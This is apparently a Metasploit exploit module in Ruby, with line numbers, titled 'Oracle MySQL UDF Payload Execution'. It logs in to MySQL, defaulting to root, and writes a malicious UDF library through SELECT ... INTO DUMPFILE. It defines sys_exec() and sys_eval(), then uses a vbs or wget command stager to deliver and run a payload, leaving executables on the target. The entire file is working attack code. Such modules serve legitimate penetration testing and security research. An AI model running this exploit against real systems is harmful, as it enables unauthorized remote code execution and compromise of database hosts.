1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::MYSQL
10
  include Msf::Exploit::CmdStager
11
  include Msf::OptionalSession::MySQL
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'Oracle MySQL UDF Payload Execution',
18
        'Description' => %q{
19
          This module creates and enables a custom UDF (user defined function) on the
20
          target host via the SELECT ... into DUMPFILE method of binary injection. On
21
          default Microsoft Windows installations of MySQL (=< 5.5.9), directory write
22
          permissions not enforced, and the MySQL service runs as LocalSystem.
23

24
          NOTE: This module will leave a payload executable on the target system when the
25
          attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
26
          and sys_exec() functions.
27
        },
28
        'Author' => [
29
          'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
30
          'todb', # this Metasploit module
31
          'h00die' # linux addition
32
        ],
33
        'License' => MSF_LICENSE,
34
        'References' => [
35
          # Bernardo's work with cmd exec via udf
36
          [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ]
37
        ],
38
        'Platform' => ['win', 'linux'],
39
        'Targets' => [
40
          [ 'Windows', { 'CmdStagerFlavor' => 'vbs' } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
41
          [ 'Linux', { 'CmdStagerFlavor' => 'wget' } ]
42
        ],
43
        'DefaultTarget' => 0,
44
        'DisclosureDate' => '2009-01-16',
45
        'Notes' => {
46
          'Reliability' => UNKNOWN_RELIABILITY,
47
          'Stability' => UNKNOWN_STABILITY,
48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
49
        } # Date of Bernardo's blog post.
50
      )
51
    )
52
    register_options(
53
      [
54
        OptBool.new('FORCE_UDF_UPLOAD', [ false, 'Always attempt to install a sys_exec() mysql.function.', false ]),
55
        OptString.new('USERNAME', [ false, 'The username to authenticate as', 'root' ])
56
      ]
57
    )
58
  end
59

60
  def post_auth?
61
    true
62
  end
63

64
  def username
65
    datastore['USERNAME']
66
  end
67

68
  def password
69
    datastore['PASSWORD']
70
  end
71

72
  def login_and_get_sys_exec
73
    # If we have a session make use of it
74
    if session
75
      print_status("Using existing session #{session.sid}")
76
      self.mysql_conn = session.client
77
    else
78
      # otherwise fallback to attempting to login
79
      m = mysql_login(username, password, 'mysql')
80
      return unless m
81
    end
82

83
    @mysql_arch = mysql_get_arch
84
    @mysql_sys_exec_available = mysql_check_for_sys_exec()
85
    if !@mysql_sys_exec_available || datastore['FORCE_UDF_UPLOAD']
86
      mysql_add_sys_exec
87
      @mysql_sys_exec_available = mysql_check_for_sys_exec()
88
    else
89
      print_status "sys_exec() already available, using that (override with FORCE_UDF_UPLOAD)."
90
    end
91

92
    return m
93
  end
94

95
  def execute_command(cmd, opts)
96
    mysql_sys_exec(cmd, datastore['VERBOSE'])
97
  end
98

99
  def exploit
100
    m = login_and_get_sys_exec()
101

102
    if not m
103
      return
104
    elsif not [:win32, :win64, :linux64, :linux32].include?(@mysql_arch)
105
      print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
106
      return
107
    else
108
      if @mysql_sys_exec_available
109
        execute_cmdstager({ :linemax => 1500, :nodelete => true })
110
        handler
111
      else
112
        print_status("MySQL function sys_exec() not available")
113
        return
114
      end
115
    end
116

117
    disconnect
118
  end
119
end
120

121